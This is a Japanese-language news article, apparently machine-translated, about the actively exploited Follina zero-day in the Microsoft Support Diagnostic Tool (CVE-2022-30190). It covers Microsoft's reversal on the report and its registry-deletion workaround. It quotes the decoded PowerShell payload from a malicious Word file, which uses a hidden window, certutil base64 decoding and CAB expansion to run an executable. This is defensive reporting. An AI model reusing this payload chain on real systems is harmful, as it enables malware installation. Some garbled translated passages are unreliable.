サポートされているすべてのバージョンのWindowsでゼロデイの重要なコードが7週間にわたって積極的に悪用されており、攻撃者はWindowsDefenderやその他のエンドポイント保護製品をトリガーせずにマルウェアをインストールするための信頼できる手段を提供しています。
Microsoft Support Diagnostic Toolの脆弱性は、4月12日に、すでに実際に悪用されていたゼロデイとしてMicrosoftに報告されました。 シャドウチェイサーグループ 言った の上 ツイッター。 A 4月21日付けの回答ただし、MSDT診断ツールはペイロードを実行する前にパスワードが必要だったため、Microsoft SecurityResponseCenterチームは報告された動作をセキュリティの脆弱性とは見なしていないことを研究者に通知しました。
ええと、気にしないでください
月曜日に、マイクロソフトはコースを逆転し、脆弱性トラッカーCVE-2022-30190で動作を特定し、報告された動作が結局のところ重大な脆弱性を構成していることを初めて警告しました。
「Wordなどの呼び出し元アプリケーションからURLプロトコルを使用してMSDTが呼び出されると、リモートでコードが実行される脆弱性が存在します」とアドバイザリは述べています。 「この脆弱性を悪用した攻撃者は、呼び出し元のアプリケーションの権限で任意のコードを実行できます。攻撃者は、プログラムのインストール、データの表示、変更、削除、またはユーザーの権限で許可されたコンテキストでの新しいアカウントの作成を行うことができます。」
この記事が公開された時点では、Microsoftはまだパッチを発行していませんでした。 代わりに、次の方法でMSDTURLプロトコルを無効にするようにお客様にアドバイスしていました。
- 走る コマンド・プロンプト なので 管理者。
- レジストリキーをバックアップするには、コマンド「reg export HKEY_CLASSES_ROOT\ms-msdt」を実行します。 ファイル名「」
- コマンド「regdeleteHKEY_CLASSES_ROOT\ ms-msdt/f」を実行します
当初はマイクロソフトが見逃していましたが、研究者がこの脆弱性を再び発見しました Word文書を特定しました 金曜日にVirusTotalにアップロードされ、これまで知られていなかった攻撃ベクトルを悪用しました。
研究者のKevinBeaumontによる分析によると、このドキュメントはWordを使用してリモートWebサーバーからHTMLファイルを取得します。 次に、ドキュメントはMSProtocol URIスキームを使用して、PowerShellコマンドをロードして実行します。
「それは不可能なはずだ」とボーモントは書いた。
残念ながら、 は 可能。
ドキュメント内のコマンドがデコードされると、次のように変換されます。
$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
警備会社ハントレスの研究者ジョン・ハモンドによると、スクリプトは次のとおりです。
- 非表示のウィンドウを次のように開始します。
- 実行中の場合はmsdt.exeを強制終了します
- RARファイル内のファイルをループして、エンコードされたCABファイルのBase64文字列を探します
- このBase64でエンコードされたCABファイルを次のように保存します 1.t
- 次のように保存するBase64でエンコードされたCABファイルをデコードします 1.c
- を展開します 1.c CABファイルを現在のディレクトリに入れ、最後に:
- 実行する rgb.exe (おそらく1.c CABファイル内で圧縮されています)
Beaumontは、2020年8月にMSDTを使用してコードを実行する方法を示したこの学術論文にも注意を促しました。 これは、会社のセキュリティチームが、この動作が悪意を持って悪用される可能性を把握できなかったことが少なくとも1回あったことを示しています。
いいえ、保護されたビューはあなたを救いません
通常、Wordは、インターネットからダウンロードされたコンテンツを、マクロやその他の潜在的に有害な機能を無効にするモードである保護されたビューとしてロードするように設定されています。 理由は不明ですが、Beaumont氏によると、ドキュメントがリッチテキスト形式のファイルとして読み込まれると、保護されたビューはもちろん、ドキュメントを開かなくても(エクスプローラーの[プレビュー]タブから)実行されます。
言い換えると、ハントレスの研究者は、RTFファイルは「Windowsエクスプローラー内のプレビューペインだけでこのエクスプロイトの呼び出しをトリガーできる」と書いています。 そうすることで、「これは、悪用するための「シングルクリック」だけでなく、潜在的に「ゼロクリック」トリガーによって、この脅威の重大度を拡張します。」
金曜日にVirusTotalにアップロードされたドキュメントに加えて、研究者は4月12日にアップロードされた同じゼロデイを悪用する別のWordファイルを発見しました。
このパッチが適用されていない脆弱性の重大性を考えると、Microsoft Officeに依存している組織は、それがネットワークにどのように影響するかを徹底的に調査する必要があります。 MSDT URLプロトコルを無効にしても、短期的には、場合によっては長期的には大きな混乱が生じる可能性はありません。 調査中(少なくともMicrosoftが詳細とガイダンスをリリースするまで)、Officeユーザーはプロトコルを完全にオフにし、インターネット経由でダウンロードされたドキュメントをさらに精査する必要があります。